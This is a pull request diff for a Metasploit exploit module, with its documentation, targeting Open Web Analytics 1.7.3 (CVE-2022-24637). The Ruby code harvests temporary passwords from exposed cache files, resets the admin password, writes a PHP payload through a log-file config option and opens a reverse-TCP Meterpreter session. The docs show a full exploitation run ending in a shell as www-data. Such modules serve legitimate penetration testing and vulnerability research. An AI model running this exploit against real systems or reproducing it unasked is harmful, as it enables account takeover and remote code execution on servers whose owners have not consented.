### PR TITLE
Open web analytics 1.7.3 remote code execution

### DIFF
--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -41,24 +41,25 @@ SSL => false
 msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
 LHOST => 172.22.0.1
 msf6 exploit(multi/http/open_web_analytics_rce) > check
-[+] 127.0.0.1:80 - The target is vulnerable.
+[*] 127.0.0.1:80 - The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
 msf6 exploit(multi/http/open_web_analytics_rce) > run
 
 [*] Started reverse TCP handler on 172.22.0.1:4444 
-[+] Connected to http://127.0.0.1:80/ successfully!
+[+] Connected to http://127.0.0.1/ successfully!
 [*] Attempting to find cache of 'admin' user
-[+] Found temporary password for user 'admin': b42f457df9d9482324ca8fe041f19f1c
+[+] Found temporary password for user 'admin': ba47fd0842cfb8e0109ca34e7806b84c
 [+] Changed the password of 'admin' to 'pwned'
 [+] Logged in as admin user
 [*] Creating log file
 [+] Wrote payload to file
 [*] Sending stage (39927 bytes) to 172.22.0.3
-[*] Meterpreter session 3 opened (172.22.0.1:4444 -> 172.22.0.3:47728) at 2023-03-09 13:55:58 +0100
+[*] Meterpreter session 2 opened (172.22.0.1:4444 -> 172.22.0.3:47916) at 2023-03-11 17:22:04 +0100
 [+] Triggering payload! Check your listener!
-[*] You can trigger the payload again at http://127.0.0.1:80/owa-data/caches/ERaG8bho.php
+[*] You can trigger the payload again at http://127.0.0.1/owa-data/caches/p85iCBRq.php
 
 meterpreter > pwd
 /var/www/html/owa-data/caches
 meterpreter > getuid
 Server username: www-data
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -1,0 +1,63 @@
+## Vulnerable Application
+
+Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
+
+## Verification Steps
+
+1. Start a vulnerable instance of OWA using docker
+    - Open https://github.com/Pflegusch/CVE-2022-24637/deployment
+    - ``docker compose up -d``
+    - Open http://127.0.0.1:8080
+    - Follow installation steps using the envs from the ``docker-compose.yml`` file
+        - Public URL: ``http://127.0.0.1/``
+        - Database Host (docker inspect db-container and get ``IPAddress``, e.g ``172.18.0.2``)
+        - Database Port: ``3306``
+        - Database Name: ``owa``
+        - Database User: ``owa``
+        - Database Password: ``Demo12+#``
+        - Continue
+        - Site Domain: ``http://127.0.0.1``
+        - Admin name: ``admin``
+        - E-Mail: ``admin@admin.com``
+        - Password: ``Demo12+#``
+
+2. Start msfconsole
+3. ``use exploit/multi/http/open_web_analytics_rce``
+4. ``set RHOSTS 127.0.0.1``
+5. ``set RPORT 80``
+6. ``set SSL false``
+7. ``set LHOST 172.18.0.1`` -> this needs to be bridge IP that got created with the ``docker compose up -d`` command
+8. ``check``
+9. ``run``
+
+````
+msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/open_web_analytics_rce) > set RPORT 80
+RPORT => 80
+msf6 exploit(multi/http/open_web_analytics_rce) > set SSL false
+SSL => false
+msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
+LHOST => 172.22.0.1
+msf6 exploit(multi/http/open_web_analytics_rce) > check
+[+] 127.0.0.1:80 - The target is vulnerable.
+msf6 exploit(multi/http/open_web_analytics_rce) > run
+
+[*] Started reverse TCP handler on 172.22.0.1:4444 
+[+] Connected to http://127.0.0.1:80/ successfully!
+[*] Attempting to find cache of 'admin' user
+[+] Found temporary password for user 'admin': b42f457df9d9482324ca8fe041f19f1c
+[+] Changed the password of 'admin' to 'pwned'
+[+] Logged in as admin user
+[*] Creating log file
+[+] Wrote payload to file
+[*] Sending stage (39927 bytes) to 172.22.0.3
+[*] Meterpreter session 3 opened (172.22.0.1:4444 -> 172.22.0.3:47728) at 2023-03-09 13:55:58 +0100
+[+] Triggering payload! Check your listener!
+[*] You can trigger the payload again at 'http://127.0.0.1:80//owa-data/caches/ERaG8bho.php
+
+meterpreter > pwd
+/var/www/html/owa-data/caches
+meterpreter > getuid
+Server username: www-data
+````

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -53,7 +53,7 @@ depends on the `user_id` and can get calculated with that. This option defines h
 checked for cache files with the `temp_passkey` value in it.
 
 ## Scenarios
-### Version 1.7.3 using docker deployment from
+### Version 1.7.3 using docker deployment from above
 ```
 msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -55,7 +55,7 @@ msf6 exploit(multi/http/open_web_analytics_rce) > run
 [*] Sending stage (39927 bytes) to 172.22.0.3
 [*] Meterpreter session 3 opened (172.22.0.1:4444 -> 172.22.0.3:47728) at 2023-03-09 13:55:58 +0100
 [+] Triggering payload! Check your listener!
-[*] You can trigger the payload again at 'http://127.0.0.1:80//owa-data/caches/ERaG8bho.php
+[*] You can trigger the payload again at 'http://127.0.0.1:80/owa-data/caches/ERaG8bho.php
 
 meterpreter > pwd
 /var/www/html/owa-data/caches

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -6,32 +6,32 @@ Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker 
 
 1. Start a vulnerable instance of OWA using docker
     - Download https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
-    - Start the containers: ``docker compose up -d``
+    - Start the containers: `docker compose up -d`
     - Open http://127.0.0.1:80/
-    - Follow installation steps using the envs from the ``docker-compose.yml`` file
-        - Public URL: ``http://127.0.0.1/``
-        - Database Host (``docker inspect <db-container>`` and get ``IPAddress``, e.g ``172.22.0.2``)
-        - Database Port: ``3306``
-        - Database Name: ``owa``
-        - Database User: ``owa``
-        - Database Password: ``Demo12+#``
+    - Follow installation steps using the envs from the `docker-compose.yml` file
+        - Public URL: `http://127.0.0.1/`
+        - Database Host (`docker inspect <db-container>` and get `IPAddress`, e.g `172.22.0.2`)
+        - Database Port: `3306`
+        - Database Name: `owa`
+        - Database User: `owa`
+        - Database Password: `Demo12+#`
         - Continue
-        - Site Domain: ``http://127.0.0.1``
-        - Admin name: ``admin``
-        - E-Mail: ``admin@admin.com``
-        - Password: ``Demo12+#``
+        - Site Domain: `http://127.0.0.1`
+        - Admin name: `admin`
+        - E-Mail: `admin@admin.com`
+        - Password: `Demo12+#`
         - Continue
 
-2. Start ``msfconsole``
-3. ``use exploit/multi/http/open_web_analytics_rce``
-4. ``set RHOSTS 127.0.0.1``
-5. ``set RPORT 80``
-6. ``set SSL false``
-7. ``set LHOST 172.22.0.1`` -> this needs to be bridge IP that got created with the ``docker compose up -d`` command
-8. ``check``
-9. ``run``
+2. Start `msfconsole`
+3. `use exploit/multi/http/open_web_analytics_rce`
+4. `set RHOSTS 127.0.0.1`
+5. `set RPORT 80`
+6. `set SSL false`
+7. `set LHOST 172.22.0.1` -> this needs to be bridge IP that got created with the `docker compose up -d` command
+8. `check`
+9. `run`
 
-````
+```
 msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
 msf6 exploit(multi/http/open_web_analytics_rce) > set RPORT 80
@@ -55,10 +55,10 @@ msf6 exploit(multi/http/open_web_analytics_rce) > run
 [*] Sending stage (39927 bytes) to 172.22.0.3
 [*] Meterpreter session 3 opened (172.22.0.1:4444 -> 172.22.0.3:47728) at 2023-03-09 13:55:58 +0100
 [+] Triggering payload! Check your listener!
-[*] You can trigger the payload again at 'http://127.0.0.1:80/owa-data/caches/ERaG8bho.php
+[*] You can trigger the payload again at http://127.0.0.1:80/owa-data/caches/ERaG8bho.php
 
 meterpreter > pwd
 /var/www/html/owa-data/caches
 meterpreter > getuid
 Server username: www-data
-````
+```

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -53,32 +53,28 @@ depends on the `user_id` and can get calculated with that. This option defines h
 checked for cache files with the `temp_passkey` value in it.
 
 ## Scenarios
-### Version 1.7.3 using docker deployment from above with HTTP
+### Version 1.7.3 using docker deployment from
 ```
 msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1
-msf6 exploit(multi/http/open_web_analytics_rce) > set RPORT 80
-RPORT => 80
-msf6 exploit(multi/http/open_web_analytics_rce) > set SSL false
-SSL => false
 msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
 LHOST => 172.22.0.1
-msf6 exploit(multi/http/open_web_analytics_rce) > check
-[*] 127.0.0.1:80 - The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
 msf6 exploit(multi/http/open_web_analytics_rce) > run
 
 [*] Started reverse TCP handler on 172.22.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
 [+] Connected to http://127.0.0.1/ successfully!
 [*] Attempting to find cache of 'admin' user
-[+] Found temporary password for user 'admin': ba47fd0842cfb8e0109ca34e7806b84c
+[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
 [+] Changed the password of 'admin' to 'pwned'
 [+] Logged in as admin user
 [*] Creating log file
 [+] Wrote payload to file
 [*] Sending stage (39927 bytes) to 172.22.0.3
-[*] Meterpreter session 2 opened (172.22.0.1:4444 -> 172.22.0.3:47916) at 2023-03-11 17:22:04 +0100
+[+] Deleted QY0yivK4.php
+[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
 [+] Triggering payload! Check your listener!
-[*] You can trigger the payload again at http://127.0.0.1/owa-data/caches/p85iCBRq.php
 
 meterpreter > pwd
 /var/www/html/owa-data/caches

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -1,6 +1,10 @@
 ## Vulnerable Application
 
-Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.
+Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated
+remote attacker to obtain sensitive user information, which can be
+used to gain admin privileges by leveraging cache hashes. This occurs
+because files generated with '<?php (instead of the intended "<?php sequence) aren't
+handled by the PHP interpreter.
 
 ## Verification Steps
 
@@ -31,6 +35,17 @@ Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker 
 8. `check`
 9. `run`
 
+## Options
+### Password
+
+When exploiting the target, the password of the attacked user will be overwritten with this password.
+
+### Username
+
+The user that will be targeted with this exploit.
+
+## Scenarios
+### Version 1.7.3 using docker deployment from above with HTTP
 ```
 msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
 RHOSTS => 127.0.0.1

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -10,7 +10,7 @@ Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker 
     - Open http://127.0.0.1:80/
     - Follow installation steps using the envs from the ``docker-compose.yml`` file
         - Public URL: ``http://127.0.0.1/``
-        - Database Host (``docker inspect <db-container>`` and get ``IPAddress``, e.g ``172.18.0.2``)
+        - Database Host (``docker inspect <db-container>`` and get ``IPAddress``, e.g ``172.22.0.2``)
         - Database Port: ``3306``
         - Database Name: ``owa``
         - Database User: ``owa``
@@ -20,13 +20,14 @@ Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker 
         - Admin name: ``admin``
         - E-Mail: ``admin@admin.com``
         - Password: ``Demo12+#``
+        - Continue
 
 2. Start ``msfconsole``
 3. ``use exploit/multi/http/open_web_analytics_rce``
 4. ``set RHOSTS 127.0.0.1``
 5. ``set RPORT 80``
 6. ``set SSL false``
-7. ``set LHOST 172.18.0.1`` -> this needs to be bridge IP that got created with the ``docker compose up -d`` command
+7. ``set LHOST 172.22.0.1`` -> this needs to be bridge IP that got created with the ``docker compose up -d`` command
 8. ``check``
 9. ``run``
 

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -44,6 +44,11 @@ When exploiting the target, the password of the attacked user will be overwritte
 
 The user that will be targeted with this exploit.
 
+## Advanced Options
+### SearchLimit
+
+The exploit works by retrieving a `temp_passkey` value from a cache file that gets created for each user when trying to login with it. Since the `/owa-data/caches/` directory is publicly accessible, we can retrieve these cache files. The exact path for the cache files depends on the `user_id` and can get calculated with that. This option defines how many calculated paths, starting from 0, should be checked for cache files with the `temp_passkey` value in it.
+
 ## Scenarios
 ### Version 1.7.3 using docker deployment from above with HTTP
 ```

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -5,12 +5,12 @@ Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker 
 ## Verification Steps
 
 1. Start a vulnerable instance of OWA using docker
-    - Open https://github.com/Pflegusch/CVE-2022-24637/deployment
-    - ``docker compose up -d``
-    - Open http://127.0.0.1:8080
+    - Download https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
+    - Start the containers: ``docker compose up -d``
+    - Open http://127.0.0.1:80/
     - Follow installation steps using the envs from the ``docker-compose.yml`` file
         - Public URL: ``http://127.0.0.1/``
-        - Database Host (docker inspect db-container and get ``IPAddress``, e.g ``172.18.0.2``)
+        - Database Host (``docker inspect <db-container>`` and get ``IPAddress``, e.g ``172.18.0.2``)
         - Database Port: ``3306``
         - Database Name: ``owa``
         - Database User: ``owa``
@@ -21,7 +21,7 @@ Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker 
         - E-Mail: ``admin@admin.com``
         - Password: ``Demo12+#``
 
-2. Start msfconsole
+2. Start ``msfconsole``
 3. ``use exploit/multi/http/open_web_analytics_rce``
 4. ``set RHOSTS 127.0.0.1``
 5. ``set RPORT 80``

--- a/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
+++ b/documentation/modules/exploit/multi/http/open_web_analytics_rce.md
@@ -47,7 +47,10 @@ The user that will be targeted with this exploit.
 ## Advanced Options
 ### SearchLimit
 
-The exploit works by retrieving a `temp_passkey` value from a cache file that gets created for each user when trying to login with it. Since the `/owa-data/caches/` directory is publicly accessible, we can retrieve these cache files. The exact path for the cache files depends on the `user_id` and can get calculated with that. This option defines how many calculated paths, starting from 0, should be checked for cache files with the `temp_passkey` value in it.
+The exploit works by retrieving a `temp_passkey` value from a cache file that gets created for each user when trying to login with it.
+Since the `/owa-data/caches/` directory is publicly accessible, we can retrieve these cache files. The exact path for the cache files
+depends on the `user_id` and can get calculated with that. This option defines how many calculated paths, starting from 0, should be
+checked for cache files with the `temp_passkey` value in it.
 
 ## Scenarios
 ### Version 1.7.3 using docker deployment from above with HTTP

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -1,6 +1,7 @@
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
+  include Msf::Exploit::FileDropper
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -180,6 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     nonce = get_update_nonce(res)
     log_location = 'owa-data/caches/' + shell_filename
+    register_file_for_cleanup(shell_filename)
 
     res = send_request_cgi(
       'method' => 'POST',

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -210,7 +210,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}")
+      'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{shell_filename}"),
+      timeout: 1
     )
 
     print_good('Triggering payload! Check your listener!')

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -167,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code == 200
       print_good("Logged in as #{username} user")
     else
-      fail_with(Failure::Unknown, "An error occurred during the login attempt of user #{username}")
+      fail_with(Failure::UnexpectedReply, "An error occurred during the login attempt of user #{username}")
     end
 
     res = send_request_cgi(
@@ -192,11 +192,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'owa_config[base.error_log_level]' => 2
       }
     )
-    if !res
-      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
-    else
-      print_status('Creating log file')
-    end
+    fail_with(Failure::Unreachable, 'An error occurred when attempting to update config!') unless res && res.code == 302
+    print_status('Creating log file')
 
     res = send_request_cgi(
       'method' => 'POST',
@@ -208,11 +205,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'owa_config[shell]' => payload.encoded + '?>'
       }
     )
-    if !res
-      fail_with(Failure::Unknown, 'An error occurred when attempting to update config!')
-    else
-      print_good('Wrote payload to file')
-    end
+    fail_with(Failure::Unknown, 'An error occurred when attempting to update config!') unless res && res.code == 302
+    print_good('Wrote payload to file')
 
     send_request_cgi(
       'method' => 'GET',
@@ -236,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
     regex_result = cache_raw.match(regex_cache_base64)
 
     unless regex_result
-      fail_with(Failure::Unknown, 'The provided URL does not appear to be vulnerable!')
+      fail_with(Failure::NotVulnerable, 'The provided URL does not appear to be vulnerable!')
     end
 
     Base64.decode64(regex_result[1]).force_encoding('ascii')
@@ -244,16 +238,31 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_cache_username(cache)
     match = cache.match(/"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"/)
+
+    unless match
+      fail_with(Failure::NotVulnerable, 'The username can not be extracted from the cache file!')
+    end
+
     match[1]
   end
 
   def get_cache_temppass(cache)
     match = cache.match(/"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"/)
+
+    unless match
+      fail_with(Failure::NotVulnerable, 'The temp_passkey variable can not be extracted from the cache file!')
+    end
+
     match[1]
   end
 
   def get_update_nonce(page)
     update_nonce = page.body.match(/owa_nonce" value="(\w*)"/)[1]
+
+    unless update_nonce
+      fail_with(Failure::NotVulnerable, 'The update_nonce variable can not be extracted from the page body!')
+    end
+
     update_nonce
   end
 end

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = establish_connection
+    res = check_connection
     return CheckCode::Unknown('Connection failed') unless res
     return CheckCode::Safe if !res.body.include?('Open Web Analytics')
 
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
       $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) \
       { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>"
 
-    res = establish_connection
+    res = check_connection
     if res
       print_good("Connected to #{base_url} successfully!")
     end
@@ -227,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("You can trigger the payload again at #{shell_url}")
   end
 
-  def establish_connection
+  def check_connection
     url = get_normalized_url(datastore['RHOSTS'])
     res = send_request_cgi(
       'method' => 'GET',

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -63,9 +63,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  # This is needed to bypass self signed certificate verification
-  OpenSSL::SSL::VERIFY_PEER = OpenSSL::SSL::VERIFY_NONE
-  I_KNOW_THAT_OPENSSL_VERIFY_PEER_EQUALS_VERIFY_NONE_IS_WRONG = nil
   def exploit
     base_url = get_normalized_url(datastore['RHOSTS'])
     username = datastore['Username']
@@ -245,9 +242,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_normalized_url(url)
-    # url += '/' unless url[-1] == '/'
-    # url = "http://#{url}" unless url.start_with?('http://', 'https://')
-    url = "https://#{url}"
+    url += ":#{datastore['RPORT']}/"
+    if datastore['SSL']
+      url = "https://#{url}"
+    else
+      url = "http://#{url}"
+    end
     url
   end
 

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
             ARTIFACTS_ON_DISK, # /owa-data/caches/{get_random_string(8)}.php
             IOC_IN_LOGS, # Malicious GET/POST requests in the webservice logs
             ACCOUNT_LOCKOUTS, # Account passwords will be changed in this module
+            CONFIG_CHANGES, # Will update config files to trigger the exploit
           ]
         }
       )

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -265,8 +265,7 @@ class MetasploitModule < Msf::Exploit::Remote
     regex_result = cache_raw.match(regex_cache_base64)
 
     unless regex_result
-      print_message('The provided URL does not appear to be vulnerable!', 'ERROR')
-      exit
+      fail_with(Failure::Unknown, 'The provided URL does not appear to be vulnerable!')
     end
 
     cache_base64 = regex_result[1]

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if !found
-      fail_with(Failure::Unknown, "No cache found. Are you sure \"#{username}\" is a valid user?")
+      fail_with(Failure::NotFound, "No cache found. Are you sure \"#{username}\" is a valid user?")
     end
 
     cache_temppass = get_cache_temppass(cache)

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'PAYLOAD' => 'php/meterpreter/reverse_tcp',
           'Username' => 'admin',
-          'Password' => 'pwned'
+          'Password' => 'pwned',
+          'Directory' => '/var/www/html/'
         },
         'Targets' => [ ['Automatic', {}] ],
         'DisclosureDate' => '2022-03-18',
@@ -48,6 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('Username', [ false, 'Target username (Default: admin)']),
       OptString.new('Password', [ false, 'Target new password (Default: pwned)']),
+      OptString.new('Directory', [ false, 'Path to the owa installation (Default: /var/www/html/)'])
     ])
   end
 
@@ -78,9 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
       break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; \
       $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) \
       { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>"
-
-    shell_filename = "#{get_random_string(8)}.php"
-    shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
 
     res = establish_connection
     if res
@@ -180,8 +179,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
     )
 
+    shell_filename = "#{get_random_string(8)}.php"
+    shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
+
     nonce = get_update_nonce(res)
-    log_location = '/var/www/html/owa-data/caches/' + shell_filename
+    log_location = "#{datastore['Directory']}owa-data/caches/" + shell_filename
+
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral'),
@@ -221,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     print_good('Triggering payload! Check your listener!')
-    print_status("You can trigger the payload again at '#{shell_url}")
+    print_status("You can trigger the payload again at #{shell_url}")
   end
 
   def establish_connection

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -47,9 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('Username', [ false, 'Target username (Default: admin)']),
-      OptString.new('Password', [ false, 'Target new password (Default: pwned)']),
-      OptString.new('Directory', [ false, 'Path to the owa installation (Default: /var/www/html/)'])
+      OptString.new('Username', [ true, 'Target username (Default: admin)']),
+      OptString.new('Password', [ true, 'Target new password (Default: pwned)']),
     ])
   end
 
@@ -170,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     shell_url = "#{full_uri}owa-data/caches/#{shell_filename}"
 
     nonce = get_update_nonce(res)
-    log_location = "#{datastore['Directory']}owa-data/caches/" + shell_filename
+    log_location = 'owa-data/caches/' + shell_filename
 
     res = send_request_cgi(
       'method' => 'POST',

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -65,7 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    base_url = get_normalized_url(datastore['RHOSTS'])
     username = datastore['Username']
     new_password = datastore['Password']
 
@@ -83,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = check_connection
     if res
-      print_good("Connected to #{base_url} successfully!")
+      print_good("Connected to #{full_uri} successfully!")
     end
 
     res = send_request_cgi(
@@ -180,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     shell_filename = "#{rand_text_alphanumeric(8)}.php"
-    shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
+    shell_url = "#{full_uri}owa-data/caches/#{shell_filename}"
 
     nonce = get_update_nonce(res)
     log_location = "#{datastore['Directory']}owa-data/caches/" + shell_filename
@@ -228,44 +227,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_connection
-    url = get_normalized_url(datastore['RHOSTS'])
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm')
     )
     if !res
-      fail_with(Failure::Unknown, "Could not connect to #{url}")
+      fail_with(Failure::Unknown, "Could not connect to #{full_uri}")
     else
       res
     end
   end
 
-  def get_normalized_url(url)
-    url += ":#{datastore['RPORT']}/"
-    if datastore['SSL']
-      url = "https://#{url}"
-    else
-      url = "http://#{url}"
-    end
-    url
-  end
-
   def get_cache_content(cache_raw)
-    regex_cache_base64 = /\*(\w*)/
+    regex_cache_base64 = /\*(\w*={0,2})/
     regex_result = cache_raw.match(regex_cache_base64)
 
     unless regex_result
       fail_with(Failure::Unknown, 'The provided URL does not appear to be vulnerable!')
     end
 
-    cache_base64 = regex_result[1]
-
-    b64_string = cache_base64
-    b64_string += '=' * ((4 - cache_base64.length % 4) % 4)
-
-    cache_base64 = b64_string
-
-    Base64.decode64(cache_base64).force_encoding('ascii')
+    Base64.decode64(regex_result[1]).force_encoding('ascii')
   end
 
   def get_cache_username(cache)

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -47,8 +47,12 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('Username', [ true, 'Target username', 'admin']),
-      OptString.new('Password', [ true, 'Target new password', 'pwned']),
+      OptString.new('Username', [ true, 'Target username', 'admin' ]),
+      OptString.new('Password', [ true, 'Target new password', 'pwned' ]),
+    ])
+
+    register_advanced_options([
+      OptInt.new('SearchLimit', [ false, 'Upper limit of user ids to check for usable cache file', 100 ])
     ])
   end
 
@@ -83,14 +87,20 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     if res && res.code != 200
-      fail_with(Failure::UnexpectedReply, 'An error occured during the login attempt!')
+      fail_with(Failure::UnexpectedReply, 'An error occurred during the login attempt!')
     end
 
     print_status("Attempting to find cache of '#{username}' user")
 
     found = false
     cache = nil
-    100.times do |key|
+
+    limit = datastore['SearchLimit']
+    if limit < 0
+      fail_with(Failure::BadConfig, 'SearchLimit must be set to a number > 0!')
+    end
+
+    limit.times do |key|
       user_id = "user_id#{key}"
       userid_hash = Digest::MD5.hexdigest(user_id)
       filename = "#{userid_hash}.php"
@@ -106,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       cache = get_cache_content(cache_raw)
       cache_username = get_cache_username(cache)
       if cache_username != username
-        print_message("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}", 'INFO')
+        print_status("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}")
         next
       else
         found = true

--- a/modules/exploits/multi/http/open_web_analytics_rce.rb
+++ b/modules/exploits/multi/http/open_web_analytics_rce.rb
@@ -25,10 +25,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Licence' => MSF_LICENSE,
         'Platform' => ['php'],
         'DefaultOptions' => {
-          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
-          'Username' => 'admin',
-          'Password' => 'pwned',
-          'Directory' => '/var/www/html/'
